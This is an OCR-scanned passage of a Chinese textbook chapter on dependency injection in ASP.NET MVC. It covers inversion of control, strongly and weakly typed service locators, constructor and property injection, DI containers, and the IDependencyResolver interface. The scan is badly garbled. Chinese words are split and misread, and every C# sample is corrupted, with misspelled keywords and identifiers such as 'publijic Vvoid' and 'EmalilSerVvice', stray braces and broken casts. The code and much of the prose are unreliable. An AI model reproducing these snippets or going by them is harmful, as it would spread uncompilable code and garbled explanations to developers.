Silverstein， 他 们 在 1977 年 由 牛津 大 学 出 版 社 出 版 的 A Pattern Laneuage: Towns, Buildings, 
and Construction 一 书 中 疙 述 了 这 一 概念 ， 该 书 从 模式 角度 描绘 了 建筑 和 城市 规划 的 视图 ， 
并 利用 这 一 视图 来 描述 问题 以 及 解决 这 些 问题 的 方法 。 

在 软件 开发 领域 ，Kent Beck 和 Ward Cunningham 最 早 采 用 模式 语言 的 思想 ， 并 在 1987 
年 的 OOPSLA 会 议 上 介绍 了 他 们 的 经 验 。 也 许 最 早 系统 地 介绍 软件 开发 模式 核心 的 应 该 是 
1994 出 版 的 著作 Desien Patterns: Elements of Reusable Object-Oriented Software, 该 书 通常 
被 称 作 “4 人 组 ”( 或 “GoF”)， 之 所 以 这 样 称 呼 ， 是 因为 该 书 的 4 位 作者 : Erich Gamma、 
Richard Helm、Ralph Johnson 和 John Vlissides。 

目 那 以 后 ， 软 件 模 式 的 思想 迅速 推广 开 来 ， 大 量 人 员 涌 入 这 一 领域 ， 并 涌现 出 一 批 大 
师 级 的 人 物 ， 如 Martin Fowler、Alan Shalloway 和 James R. Trott 等 。 


12.1.1 设计 模式 一 一 控制 反 转 模式 
几乎 每 个 人 都 见 过 (或 编写 过 ) 下 面 的 代码 : 


public class EmalilSerVvice 


{ 
publijic Vvoid SendMessage() { -.。 } 
} 
public class NotificationSsystem 
{ 
private Emailservice svc; 
public NotificationSystem!() 
{ 
SVC = new EmailService(); 
} 
public void InterestingEventHappened () 
{ 
SVC-SendMessage () 
} 
} 


在 上 面 的 代码 中 ，NotificationSystem 类 依赖 于 EmailService 类 。 当 一 个 组 件 依 赖 于 其 
他 组 件 时 ， 我 们 称 其 为 耘 合 (coupling)。 在 本 例 中 ， 通 知 系统 (NotificationSystem) 在 其 构造 
图 数 内 部 直接 创建 e-mail 服务 的 一 个 实例 换言之， 通知 系统 精确 地 知道 创建 和 使 用 了 哪 
种 类 型 的 服务 。 这 种 耘 合 表 示 了 代码 的 内 部 链接 性 。 一 个 类 知道 与 其 交互 的 类 的 大 量 信息 
(正如 上 面 的 示例 )， 我 们 称 其 为 高 耦合 。 

在 软件 设计 过 程 中 ， 高 看 合 通常 认为 是 软件 设计 的 责任 。 当 一 个 类 精确 地 知道 另 一 个 
类 的 设计 和 实现 时 ， 就 会 增加 软件 修改 的 负担 ， 因 为 修改 一 个 类 很 有 可 能 破坏 依赖 于 它 的 
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上 面 的 代码 设计 还 存在 一 个 问题 : 当 感 兴趣 的 事件 发 生 时 ， 通 知 系统 如 何 发 送 其 他 类 
型 的 信息 ? 例如 ， 系 统管 理 员 可 能 想得到 文本 消息 而 不 是 电子 邮件 ， 或 者 为 了 方便 以 后 碍 
看 通知 ， 而 把 每 个 通知 都 记录 在 数据 库 中 。 要 实现 这 些 功能 ， 我 们 必须 重新 实现 
NotificationSystem 类 。 

为 降低 组 件 之 间 的 入 合 程度 ， 一 般 采 取 两 个 独立 但 相关 的 步骤 : 

(1) 在 两 块 代码 之 间 引 入 抽象 层 。 

在 NET 平 台中 ,， 通 各 使 用 接口 (或 抽象 类 ) 来 代表 两 个 类 之 间 的 抽象 层 。 针 对 上 面 的 示 
例 ， 我 们 可 以 引入 一 个 接口 ， 并 确保 编写 的 代码 只 调用 接口 中 的 方法 和 属性 。 这 样 一 来 ， 
NotificationSystem 类 中 的 私有 副本 就 变 成 接口 的 一 个 实例 ， 而 不 再 是 具体 类 型 ， 并 且 对 其 
构造 图 数 隐藏 了 实际 类 型 ， 代 码 如 下 所 示 ; 


Public interface IMessagingService 


{ 
void SendMessage () : 


} 


public class EmallService : IMessagingService 
{ 

publjc Vvoid SendMessage() { ... } 
f 


public class NotificationSsystem 


{ 
private IMessagingService svc; 
public NotificationSystem!() 
{ 
SVC = new EmailSsService (); 
} 
public void InterestijngEventHappened () 
{ 
SVC-SendMessage () ; 
} 
} 


(2) 把 选择 抽象 实现 的 责任 移 到 消费 者 类 的 外 部 。 
需要 把 EmailService 类 的 创建 移 到 NotificationSystem 类 的 外 面 。 


把 依赖 的 创建 移 到 使 用 这 些 依 赖 的 类 的 外 部 , 这 称 为 控制 反 转 模式 , 之 所 
以 这 样 命名 ， 是 因为 反 转 的 是 依赖 的 创建 ， 正 因为 如 此 ， 才 消除 了 消费 者 类 对 
依赖 创建 的 控制 。 
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控制 反 转 (IoC) 模 式 是 抽象 的 ; 它 只 是 表述 应 该 从 消费 者 类 中 移出 依赖 创建 ， 而 没有 表 
述 如 何 实现 。 在 下 面 的 章节 中 , 我 们 将 探讨 用 控制 反 转 模式 实现 责任 转移 的 两 种 常用 方法 : 
服务 定位 器 和 依赖 注入 。 
12.1.2 设计 模式 服务 定位 器 

服务 定位 器 模式 是 控制 反 转 模式 的 一 种 实现 方式 ， 它 通过 一 个 称 为 服务 定位 器 的 外 部 
组 件 来 为 需要 依赖 的 组 件 提供 依赖 。 服 务 定 位 器 有 时 是 一 个 具体 的 接口 ， 为 特定 服务 提供 
强 类 型 的 请 求 ; 有 时 它 又 可 能 是 一 个 泛 型 类 型 ， 可 以 提供 任意 类 型 的 请 求 服务 。 

1. 强 类 型 服务 定位 器 


对 于 示例 应 用 程序 的 强 类 型 服务 定位 器 可 能 有 如 下 接口 : 


public jnterface IServiceLocator 
{ 
IMessagingService GetMessaglingService ()}); 


} 

在 本 例 中 ， 当 需要 一 个 实现 了 IMessagingService 接口 的 对 象 时 ， 我 们 知道 应 该 调用 
GetMessagingService 方法 。 该 方法 返回 一 个 IMessagingService 接口 对 象 ， 因 此 ， 我 们 不 需 
要 转换 结果 的 类 型 。 

上 面 的 示例 是 把 服务 定位 器 作为 一 个 接口 ， 而 不 是 一 个 具体 类 型 。 我 们 的 目标 是 降低 
组 件 之 间 的 爆 合 程度 ， 其 中 包括 消费 者 代码 和 服务 定位 器 之 间 的 克 合 。 如 果 消 费 者 代码 实 
现 了 IServiceLocator 接口 , 就 可 以 在 运行 时 环境 中 选择 合适 的 实现 方式 。 正 如 第 13 章 中 讲 
解 的 ， 这 对 单元 测试 具有 非常 重要 的 意义 。 

要 用 强 类 型 服务 定位 器 重新 编写 NotificationSystem 类 ， 代 码 如 下 : 


public class NotificationSsSystem 


{ 
private IMessaglingSsService SVC; 
public NotificationSysteml(IServiceLocator locator) 
| 
SVC = locator.GetMessagingService (); 
} 
public Vvoid InterestingEventHappened () 
{ 
SVC.SendMessage ();} 
} 
} 


上 面 的 代码 假设 创建 NotificationSystem 实例 的 每 个 人 都 会 访问 服务 定位 器 。 这 样 做 带 来 的 
便利 是 ， 如 果 应 用 程序 通过 服务 定位 器 创建 NotificationSystem 实例 ， 那 么 定位 器 将 自身 传递 到 
NotificationSystem 类 的 构造 函数 中 ;如果 是 在 服务 定位 器 的 外 部 创建 NotificationSystem 类 的 
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实例 ， 还 需要 提供 服务 定位 器 到 NotificationSystem 类 的 实现 ， 以 便服 务 定 位 赤 找 到 它 的 依 
赖 项 。 

为 什么 要 选择 强 类 型 的 服务 定位 器 呢 ? 答案 是 显而易见 的 : 强 类 型 服务 定位 器 简单 易 
用 ; 它 使 我 们 能 够 精确 地 知道 能 够 从 服务 定位 器 得 到 哪些 服务 (也 许 同 样 重要 的 是 ， 知 道 不 
能 得 到 哪些 服务 )。 另 外 ， 如 果 IMessagingService 接口 的 实现 需要 一 些 参 数 ， 那 么 我 们 可 
以 直接 把 它们 作为 GetMessagingService 方法 调用 的 参数 来 请 求 。 

但 有 时 我 们 有 更 多 的 理由 选择 不 使 用 服务 定位 器 。 首 先 ， 服 务 定 位 器 仅 限 于 创建 那些 
在 IServiceLocator 接口 设计 时 已 经 预先 知道 的 类 型 对 象 ， 而 不 能 创建 其 他 类 型 的 对 象 ;， 其 
次 ， 当 应 用 程序 中 的 服务 数量 增加 时 ， 恕 不 得 不 持续 地 扩展 IServiceLocator 接口 的 定义 ， 
而 这 将 加 重 应 用 程序 维护 扩展 的 负担 。 


2， 弱 类 型 服务 定位 器 


如 果 在 某 个 具体 应 用 中 ， 强 类 型 服务 定位 费 的 负面 影响 超过 了 它 所 融 来 的 正面 效应 ， 
可 以 考虑 改 用 弱 类 型 服务 定位 器 (weakly-typed service locator)， 代 码 如 下 : 

public jnterface IServiceLocator 

{ 


object GetService (Type serviceType); 


} 
服务 定位 器 模式 的 这 种 变 体 更 加 灵活 ， 因 为 它 允 许 请 求 任 意 的 服务 类 型 。 之 所 以 称 为 
弱 类 型 服务 定位 器 ， 是 因为 它 采 用 Type 类 型 的 参数 ， 并 返回 一 个 非 类 型 化 的 实例 ， 也 就 是 
-个 Object 类 型 的 对 象 。 显 然 ， 需 要 把 调用 GetService 方法 返回 的 结果 转换 为 正确 类 型 的 
使 用 弱 类 型 服务 定位 器 的 NotificationSystem 类 的 代码 如 下 所 示 : 


public class NotificationSsystem 


{ 
private IMessagingService svVvc; 
Public NotificationSystem(IlIServiceLocator locator) 
{ 
SVC = (IMessaglingService,) 
locator.GetService (typeof (IMessagingService)})); 
} 
Public Vvoid InterestingEventHappened () 
{ 
SVC.SendMessage () ; 
} 
} 


上 面 的 代码 看 上 去 没有 先前 使 用 强 类 型 服务 定位 需 的 代码 倘 活 ， 这 主要 是 因为 再 要 把 
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GetService 方法 返回 的 结果 转换 为 IMessagingService 接口 类 型 。 目 从 NET 2.0 引入 泛 型 以 
来 ， 我 们 就 已 经 包含 了 GetService 方法 的 一 个 泛 型 版 本 : 


public interface IServiceLocator 


{ 
object GetService (Type serviceType); 
TService GetService<TService>(}); 
} 
按照 泛 型 方法 的 约定 ， 它 将 返回 一 个 已 经 转换 为 正确 类 型 的 对 象 ， 注 意 返 回 的 类 型 是 


TService 而 不 是 Object。 这 使 得 NotificationSystem 类 的 代码 变 得 何洁 些 : 


public class NotificationSsystem 


{ 
private IMessagingservice 3SVC:; 
public NotificationSystem(lServiceLocator locator) 
{ 
SVC = locator.GetService<IMessagingService> (1) -7 
} 
public void InterestingEventHappened () 
{ 
SVC.SendMessage () :; 
} 
} 


为 何 还 要 有 Object 版 本 的 GetService 方法 ? 

我 们 可 能 会 疑惑 为 什么 在 API 中 还 要 有 GetService 方法 的 Object 版 本 , 而 不 是 只 有 汉 
型 版 本 。 由 于 泛 型 版 本 为 我 们 省 去 了 类 型 转换 的 工作 ， 因 此 我 们 应 该 在 尽 可 能 多 的 场合 使 
用 它 ， 不 是 这 样 吗 ? 

在 实际 应 用 中 ， 我们 会 发 现 并 非 每 个 调用 API 的 消费 者 在 编译 时 都 精确 地 知道 它们 将 
要 调用 的 类 型 。 后 面 会 介绍 一 个 MVC 框架 试图 创建 控制 器 类 型 的 例子 ， 而 在 这 个 例子 中 ， 
MVC 知道 控制 器 的 类 型 ,但 它 只 能 在 运行 时 知道 ， 而 在 编译 时 并 不 知道 (例如 ， 把 对 /Home 
的 请 求 映 射 到 HomeController 控制 器 )。 因 为 泛 型 版 本 的 类 型 参数 不 仅 要 用 来 转换 类 型 ,还 
用 来 指定 服务 的 类 型 ， 所 以 在 不 使 用 映射 的 情况 下 不 能 调用 服务 定位 器 。 


该 方法 的 负面 影响 是 ， 它 强制 IServiceLocator 接口 必须 实现 两 个 几乎 相同 的 方法 ， 而 
不 是 只 实现 一 个 。 这 些 无 谓 的 努力 在 .NET 3.5 中 被 移 除 ， 因 为 3.5 版 本 中 引入 了 一 个 新 特 
性 : 扩展 方法 。 

把 扩展 方法 作为 静态 类 的 静态 方法 来 编写 ， 在 它 的 第 一 个 参数 中 利用 特殊 的 this 关键 
字 来 指定 扩展 方法 要 附加 到 的 类 型 。 把 GetService 泛 型 方法 分 割 成 为 扩展 方法 之 后 ， 代 码 
如 下 所 示 : 


第 12 章 依赖 注入 


public interface IServiceLocator 
{ 
object GetService (Type SeTVICeTITYPel) ， 


} 


public static class ServiceLocatorExtensions 


{ 
public static TService GetService<TService> (this IServiceLocator 
locator) 
{ 
return {TService) locator.GetService (七 YPect ( 工 SeTV1ILCe) ) ， 
} 
} 


现在 ， 我 们 不 必 再 费 尽 周折 编写 两 个 GetService 方法 (包括 该 方法 的 泛 型 版 本 )。 只 和 需 
要 一 人 编写 ， 便 可 被 全 世界 的 人 利用 。 


ASP.NET MVC 中 的 扩展 方法 


”ASPNETMVC 框架 充分 利用 了 扩展 方法 。 大 部 分 用 来 在 视图 中 生成 表单 的 HTML 畏 


助 方法 都 是 HtmlHelper、AjaxHelper 或 UrlHelper 类 的 扩展 方法 。 当 访问 视图 中 的 Html、 
Ajax 和 Url 对象 时 ， 我 们 能 分 别 得 到 对 应 类 型 的 对 象 。 

ASPNET MVC 中 的 扩展 方法 都 在 各 上 自 单独 的 名 称 空间 中 (通常 是 System.Web.Myvc. 
Html 或 System.Web.Mvc.Ajax)。 ASPNET MVC 团队 之 所 以 这 样 做 , 是 因为 他 们 理解 HTML 
生成 器 未 必 能 精确 匹配 应 用 程序 需要 的 内 容 。 我 们 可 以 根据 目 身 需要 ， 编 写 目 己 的 HIML 
生成 器 扩展 方法 。 如 末 从 web.config 文件 中 删除 ASPNET MVC 的 名 称 空间 ， 那 么 内 置 的 
扩展 方法 将 不 再 显示 ， 而 允许 只 显示 上 自 定 义 的 扩展 方法 并 消除 ASPNET MVC 中 的 相应 方 
法 。 当 然 ， 我 们 也 可 以 选择 将 二 者 都 显示 出 来 。 将 HIML 生成 器 作为 扩展 方法 来 编写 使 得 
应 用 程序 判别 更 加 灵活 。 


为 什么 要 选用 弱 类 型 定位 右 呢 ?” 因 为 它 能 够 弥补 强 类 型 定位 器 市 来 的 负面 影响 ， 也 就 
是 说 ， 我 们 可 以 在 预先 不 知道 的 情况 下 ， 得 到 一 个 可 用 来 创建 任意 类 型 的 接口 。 因 为 该 接 
口 不 会 经 常 发 生变 化 ， 所 以 弱 类 型 定位 器 的 使 用 可 以 减轻 应 用 程序 的 维护 负担 。 

另 一 方面 ， 弱 类 型 定位 器 接口 没有 提供 任何 有 关 可 能 被 请 求 的 服务 的 类 型 信息 ， 也 没 
有 提供 创建 自 定义 服务 的 简单 方法 。 尽 管 可 以 添加 任意 可 选 对 象 数组 作为 服务 的 “创建 参 
数 ”， 但 是 查阅 外 部 文档 是 我 们 知道 服务 需要 哪些 参数 的 仅 有 方式 。 

3. 服务 定位 器 的 利 浴 

服务 定位 器 的 用 法 比较 简单 ， 我们 先 从 某 个 地 方 得 到 服务 定位 器 ， 然 后 利用 定位 器 查 
找 依赖 。 我 们 可 能 在 一 个 已 知 的 (全 局 ) 位 置 找到 服务 定位 器 ， 或 者 通过 我 们 的 创建 者 获得 
服务 定位 器 。 尽 管 依 赖 关 系 有 时 会 发 生 改变 ， 但 签名 不 会 改变 ， 因 为 得 找 依 赖 唯一 需要 的 
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持久 签名 市 来 好 处 的 同时 ， 也 市 来 了 商 端 。 它 导致 了 组 件 需 求 的 不 表明 性 ， 使 用 组 件 
的 开发 人 员 通 过 得 看 构造 函 数 的 签名 不 能 知道 服务 要 求 的 是 什么 ， 这 使 得 他 们 不 得 个 奉 看 
那些 可 能 过 期 的 文档 ， 或 者 干脆 传递 一 个 空 服 务 定位 需 来 得 看 我 们 请 求 的 内 容 。 

需求 的 不 透明 性 促使 我 们 选择 下 一 个 反 转 控制 模式 : 依赖 注入 。 


12.1.3 ”设计 模式 一 一 依赖 注入 


依赖 注入 (Dependency Injection，DD 是 男 一 种 控制 反 转 模式 的 形式 ， 它 没有 像 服 务 定 
位 右 一 样 的 中 间 对 象 。 相 反 ， 组 件 以 一 种 允许 依赖 的 方式 来 编写 ， 通 常 由 构造 函数 参数 或 
属性 设置 器 来 显 式 表示 。 

选择 依赖 注入 而 不 选择 服务 定位 器 的 开发 人 员 往 往 都 决定 选择 需求 的 透明 性 。 正 如 下 

- 章 所 介绍 的 ， 选 择 依赖 注入 的 透明 性 在 单元 测试 阶段 具有 显著 优势 。 

1. 构造 函数 注入 

依赖 注入 的 最 常见 形式 是 构造 函数 注入 (constructor injectiom 和 和。 该 项 技术 需要 我 们 为 类 
创建 一 个 显 式 表示 所 有 依赖 的 构造 函数 ， 而 不 是 像 先 前 服务 定位 器 的 例子 一 样 ， 构 造 函 数 
把 服务 定位 器 作为 它 仅 有 的 参数 。 

如 果 采 用 构造 图 数 注 入 ，NotificationSystem 类 的 代码 将 如 下 所 示 : 


public class NotificationSsystem 


{ 
private IMessagingService Svc; 
public NotificationSystem(IMessagingService service) 
{ 
thls-SVC = service; 
} 
public void InterestingEventHappened () 
{ 
SVC.SendMessage () :; 
} 
} 


这 段 代 码 的 一 个 显著 优点 是 ， 它 极 大 地 简化 了 构造 函数 的 实现 。 组 件 总 是 期 望 创 建 它 
的 类 能 够 传递 需要 的 依赖 。 而 它 只 需 存 储 IMessagingService 接口 的 实例 以 便 之 后 使 用 。 

男 外， 这 段 代码 减少 了 NotificationSystem 类 需要 知道 的 信息 量 。 在 以 前 , NotificationSystem 
类 既 要 知道 服务 定位 器 ， 也 需要 知道 它 目 己 的 依赖 项 ， 而 现在 只 需 知 道 它 自己 的 依赖 项 就 
行 了 。 

第 三 个 优点 ， 正 如 上 面 提 到 的 ， 就 是 需求 的 透明 性 。 任 何 想 创建 NotificationSystem 类 
实例 的 代码 都 能 查看 构造 函数 ， 并 精确 地 知道 哪些 内 容 是 使 用 NotificationSystem 类 必需 
的 。 而 使 用 服务 定位 右 既 不 宕 要 猜测 ， 也 不 需要 抛 灾 抹 角 。 
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2. 属性 注入 


属性 注入 (property injection) 是 一 种 不 太 常 见 的 依赖 注入 方式 。 顾 名 思 义 ， 该 方式 是 通 
过 设置 对 象 上 的 公共 属性 而 不 是 通过 使 用 构造 函数 参数 来 注入 依赖 的 。 
如 果 采 用 属性 注入 ，NotificationSystem 类 的 代码 将 如 下 所 示 : 


public class NotificationSsSystem 


{ 
public IMessagingService MessagingService 
{ 
gets 
sets 
} 
public void InterestingEventHappened () 
{ 
MessagingService.SendMessage () : 
} 
} 


上 面 的 代码 删除 了 构造 函数 的 参数 ， 事 实 上 ， 删 除了 整个 构造 函数 ， 取 而 代 之 的 是 一 
个 属性 。 该 类 期 望 任何 消费 者 类 都 通过 属性 (而 非 通 过 构造 函数 ) 同 我 们 提供 依赖 。 

上 和 而 的 InterestingEventHappened 方法 现在 有 点 人 危险， 可 能 会 产生 异常 。 由 于 它 假定 服 
务 依赖 已 经 被 提供 ; 而 在 它 被 调用 时 ， 如 果 没 有 提供 服务 依赖 ， 那 么 它 将 抛 出 一 个 
NullReferenceException 异 营 。 鉴 于 以 上 问题 ， 我 们 应 该 更 新 InterestngEventHappened 方法 
以 确保 在 使 用 服务 之 前 已 提供 了 服务 依赖 ; 


public void InterestingEventHappened () 


{ 
1if (MessagijingService == null]l) 
{ 
throw new InvalidoperationException!l 
"Please set MessagilngService before calling ™ + 
"InterestingEventHappened()." 
); 
} 
MessagingService.SendMessage () ; 
} 


显而易见 ， 这 里 我 们 已 经 稍微 减少 了 需求 的 透明 性 ; 尽管 相对 于 服务 定位 右 而 言 ， 它 
还 算 透 明 ， 但 是 它 绝 对 比 构造 函 数 注 入 更 容易 产生 错误 。 
既然 属性 注入 降低 了 透明 性 ， 那 么 开 有 人 员 为 什么 仍然 选择 属性 注入 而 不 选择 构造 函 
数 注入 呢 ? 究 其 原因 ， 主 要 有 两 点 : 
e 如 有 果 依 赖 在 茶 种 意义 上 是 真正 可 选 的 ， 即 在 消费 者 类 不 提供 时 依赖 ， 也 有 相应 的 处 
理 。 此 时 ， 属 性 注入 可 能 是 一 个 不 错 的 选择 。 
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e 类 的 实例 可 能 壳 要 在 我 们 还 没有 控制 调用 的 构造 函数 的 情况 下 被 创建 。 这 是 一 个 不 

太 明 显 的 原因 。 本 章 后 面 讨论 依赖 注入 如 何 应 用 于 视图 页 面 时 ， 会 介绍 若干 类 似 
不 例 。 

通常 情况 下 ， 开 发 人 员 更 倾向 于 使 用 构造 函数 注入 ， 只 有 当 上 述 情况 出 现时 才 会 使 用 

属性 注入 。 显 然 ， 我 们 可 在 一 个 对 象 中 使 用 这 两 种 注入 技术 : 类 中 的 强制 性 依赖 作为 构造 


3. 依赖 注入 容器 


上 面 两 个 依赖 注入 的 例子 都 遗漏 了 一 个 大 问题 : 依赖 是 如 何 产 生 的 ? 有 人 可 能 会 说 
“把 依赖 作为 构造 函数 参数 来 编写 ”, 但 男 一 个 理解 是 它们 如 何 被 满足 。 尽管 类 的 使 用 者 可 
以 手动 提供 所 有 的 依赖 ， 但 是 随 着 时 间 推 移 这 会 变 成 一 项 很 大 的 负担 。 如 果 整 个 系统 都 支 
持 依 赖 注入 ， 那 么 这 意味 看 创建 的 任意 一 个 组 件 都 需要 我 们 知道 如 何 来 满足 每 一 部 分 的 
南 归 。 

依赖 注入 容器 便 是 使 依赖 解析 变 得 简单 的 一 种 方式 。 依 赖 注 入 容器 是 一 个 可 以 作为 组 
件 工 厂 使 用 的 软件 库 ， 它 可 以 自动 检测 和 满足 里 而 元素 的 依赖 需求 。 依 赖 注 入 容器 API 的 
使 用 接口 看 起 来 很 像 服 务 定 位 器 ， 因 为 请 求 其 执行 的 主要 操作 将 根据 类 型 提供 一 些 组 件 。 

当然 ， 它 们 是 有 区 别 的 ， 区 别 在 细节 上 。 服 务 定 位 器 的 实现 通常 极其 简单 : 我 们 只 需 
要 告诉 服务 定位 器 ,“ 如 果 有 人 请 求 这 种 类 型 ， 就 给 它 该 类 型 的 对 象 ”。 服务 定位 器 很 少 
涉及 要 使 用 对 象 的 实际 创建 过 程 。 另 一 方面 ， 依 赖 注 入 容器 经 常 配置 一 些 逻 辑 ， 像 “如 果 
有 人 请 求 这 种 类 型 ， 就 创建 一 个 该 类 型 的 对 象 并 返回 给 请 求 者 ”。 言 下 之 意 ， 该 具体 类 型 的 
创建 通常 会 反 过 来 要 求 其 他 类 型 的 创建 以 满足 它 的 依赖 要 求 。 尽 管 差别 细微 ， 但 它 却 使 得 
服务 定位 器 和 依赖 注入 容器 的 实际 应 用 产生 了 巨大 差异 。 

所 有 的 依赖 容器 都 或 多 或 少 地 拥有 人 允许 映射 类 型 (相当 于 说 ,“ 当 有 人 请 求 类 型 Tl 时 ， 
我 们 可 以 为 他 创建 一 个 类 型 为 T2 的 对 象 ”) 的 API 配置 。 许 多 依赖 容器 也 允许 根据 名 称 来 
配置 (“ 当 有 人 请 求 名 称 为 Nl1 的 类 型 Tl 时 ， 我 们 就 为 他 创建 一 个 类 型 为 T2 的 对 象 ”)。 
一 些 人 甚至 尝试 创建 任意 的 类 型 ， 尽 管 这 些 类 型 没有 被 预先 配置 ， 但 只 要 这 些 请 求 的 类 型 
是 具体 的 而 非 抽 象 的 就 可 以 了 。 一 些 依赖 容器 甚至 支持 拦截 (interception) 功 能 , 使 用 该 功能 
可 在 类 型 创建 时 或 者 在 调用 对 象 的 方法 或 属性 时 ， 设 置 等 效 的 事件 处 理 程序 。 

考虑 到 本 书 的 目标 ， 这 些 高 级 特性 用 法 已 经 超出 了 本 书 的 讨论 范围 。 如 果 决 定 使 用 依 
赖 注入 容器 ， 可 以 查阅 在 线 文档 ， 上 面 介绍 了 如 何 进行 这 些 高 级 特性 的 配置 。 


12.2 MVC 中 的 依赖 解析 


上 面 已 经 讨论 了 控制 反 转 的 基础 内 容 ， 下 面 继续 探讨 它 在 ASPNET MVC 中 的 应 用 。 
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四 注意 ”本章 只 是 讲解 向 ASPNET MVC 提供 服务 的 原理 机 制 , 而 不 讲解 如 
何 实现 这 些 具 体 的 服务 ; 如 果 想 学 习 服 务 的 实现 ， 请 参阅 第 14 章 。 


ASPNET MVC 与 容 顷 交互 的 主要 方式 就 是 通过 为 ASPNET MVC 应 用 程序 创建 的 一 
个 接口 : Idependency Resolver。 该 接口 的 定义 如 下 : 
public interface IDependencyResolver 
{ 
object GetService (Type serviceType); 


IEnumerable<object> GetServices (TYPe serviceType):; 


} 


该 接口 由 ASPNET MVC 框架 本 身 使 用 。 当 注册 一 个 依赖 注入 容器 (或 定位 器 ) 时 ， 我 们 
就 需要 实现 该 接口 。 通 常 可 在 Global.asax 文件 中 注册 一 个 解析 器 实例 ， 代 码 如 下 : 


DependencyResolver.Current = new MyDependencyResolver |(); 


使 用 NuGet 得 到 容器 


如 果 能 在 使 用 依赖 注入 时 ， 免 去 IDependencyResolver 接口 的 实现 就 完美 了 , 值得 庆 才 


的 是 ，NuGet 能 够 做 到 这 一 点 。 

NuGet 是 ASPNET MVC 中 新 添加 的 包 管理 器 。 它 可 以 使 我 们 毫 不 费力 地 添加 对 常见 
Web 开源 项 目的 引用 。 想 了 解 NuGet 的 更 多 内 容 ， 请 参见 本 书 第 10 章 内 容 。 

在 撰写 本 文 时 ， 在 NuGet 上 和 查找 像 *IoC” 和 “dependency” 这 类 短语 ， 会 找到 一 些 可 
下 载 的 依赖 注入 容器 。 大 部 分 的 容器 都 有 一 个 对 应 的 ASPNET MVC 文 持 包 ， 也 就 是 说 ， 
它们 能 捆绑 IDependencyResolver 接口 的 一 个 实现 。 


由 于 之 前 的 ASPNET MVC 版 本 中 没有 依赖 解析 妖 这 样 的 概念 ， 所 以 解析 器 是 一 个 可 
选项 ， 默 认 情 况 下 ， 创 建 的 项 目 没 有 注册 依赖 解析 右 。 如 果 不 需 要 依赖 解析 的 广 持 ， 就 可 
以 不 包含 解析 器 。 男 外 ，ASPNET MVC 中 可 以 作为 服务 使 用 的 每 项 内 容 几 乎 都 能 在 解析 
器 中 注册 ， 或 者 用 一 个 传统 的 注册 点 注册 (很 多 情况 下 ， 都 是 这 样 )。 

当 问 ASPNET MVC 框架 提供 服务 时 ,可 以 选择 最 适合 我 们 的 注册 模型 。 通 常情 况 下 ， 
当 需 要 服务 时 ，ASPNET MVC 会 首先 咨询 依赖 解析 器 ， 当 在 依赖 解析 右 中 找 不 到 服务 时 ， 
它 再 回头 来 咨询 传统 注册 点 。 

这 里 不 再 展示 回 依 赖 解 析 器 中 注册 服务 的 代码 。 为 什么 呢 ? 主要 是 因为 使 用 的 注册 
API 依赖 于 我 们 选择 使 用 的 依赖 注入 容器 。 想 了 解 更 多 有 关 容 器 的 注册 和 配置 的 信息 ， 请 
查阅 容器 类 的 相关 文档 。 

请 注意 ，ASPNET MVC 以 两 种 不 同 的 方式 使 用 服务 ， 因 此 ， 依 赖 解析 接口 上 有 两 个 
方法 。 
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在 应 用 程序 中 应 该 使 用 依赖 解析 器 吗 ? 


我 们 可 能 会 抵挡 不 住 诱惑 而 在 应 用 程序 中 使 用 IDependencyResolver 接口 ， 其 实 , 我 们 
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应 该 抗拒 诱惑 。 

依赖 解析 器 接口 有 很 强 的 目的 性 。 它 只 是 MVC 本 身 需 要 的 内 容 ， 除 此 之 外 别 无 其 他 。 
它 并 不 是 要 隐藏 或 替代 依赖 注入 容器 的 传统 API。 大 部 分 的 容器 都 有 复杂 而 有 趣 的 API; 
事实 上 ， 我 们 选择 容器 ， 依 据 的 是 它 所 能 够 提供 的 API 和 特性 ， 而 不 是 其 他 的 原因 。 
12.2.1 单一 注册 服务 


用 户 为 MVC 使 用 的 服务 能 且 仅 能 注册 一 个 服务 实例 。 此 关 服 务 称 为 单一 注册 服务 
(singly-registered services)， 用 来 从 解析 器 中 检索 单一 注册 服务 的 方法 是 GetService。 
对 于 所 有 的 单一 注册 服务 ， 在 第 一 次 使 用 时 ，ASPNET MVC 都 会 调用 依赖 解析 器 ， 
并 把 返回 的 结果 绥 存 起 来 ， 以 使 应 用 程序 在 其 生命 周期 中 继续 使 用 。 我 们 可 以 选择 使 用 依 
赖 解析 器 API， 也 可 以 选择 使 用 传统 的 注册 API( 如 果 可 用 )。 由 于 ASPNET MVC 只 能 使 用 
单一 注册 服务 的 一 个 实例 ， 因 此 ， 我 们 不 能 同时 使 用 依赖 解析 右 API 和 传统 注册 API， 而 
只 能 使 用 其 中 一 个 。 
GetService 实现 方法 要 么 返回 一 个 在 解析 器 中 注册 的 服务 实例 ， 要 么 返回 null( 如 果 在 
解析 器 中 找 不 到 要 查找 的 服务 的 话 )。 表 12-1 列举 了 MVC 中 使 用 的 单一 注册 服务 。 
表 12-1 MVC 中 的 单一 注册 服务 
Service (Traditional Recistration APD 
Default Service Implementation 
IControllerActivator (none) 
DefaultControllerActivator 
IControllerFactory (ControllerBuilder.Current 


.SetControllerFactory) 


DefaultControllerFactory 


IViewPageActivator (none) 
DefaultViewPageActivator 

ModelMetadataProvider 

(ModelMetadataProviders.Current) 


DataAnnotationsModelMV[etadataProvider 


12.2.2 ”复合 注册 服务 


与 单一 注册 服务 相 比 ，ASPNET MVC 也 使 用 一 些 可 用 来 注册 多 个 服务 实例 的 服务 ， 
这 些 服务 以 竞争 或 联合 的 方式 为 ASPNET MVC 提供 信息 。ASPNET MVC 可 以 调用 这 些 
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复合 注册 服务 (multiply-registered services)。 我 们 可 以 使 用 GetServices 方法 来 从 解析 器 中 检 
索 复 合 注册 服务 。 
对 于 所 有 的 复合 注册 服务 ， 当 第 一 次 需要 这 些 服 务 时 ，ASPNET MVC 就 会 调用 依赖 
解析 器 ， 并 把 返回 的 结果 绥 存 起 来 ， 以 便 在 应 用 程序 的 生命 周期 中 使 用 。 可 以 结合 使 用 依 
赖 解析 器 API 和 传统 的 注册 API， 因 为 ASPNET MVC 在 一 个 合并 的 服务 列表 中 合并 了 二 
者 的 结果 ,在 合并 的 服务 列表 中 , 使 用 依赖 解析 器 注册 的 服务 的 位 置 要 在 使 用 传统 注册 API 
注册 的 服务 前 面 。 这 些 复合 注册 服务 提供 信息 的 优先 级 非 负 重要; 也 就 是 说 ， 当 ASPNET 
MVC 提供 信息 时 ， 它 会 通 历 合并 列表 中 的 每 一 个 服务 实例 ， 第 一 个 提供 请 求 信 息 的 服务 
实例 便 是 ASPNET MVC 要 使 用 的 服务 实例 。 
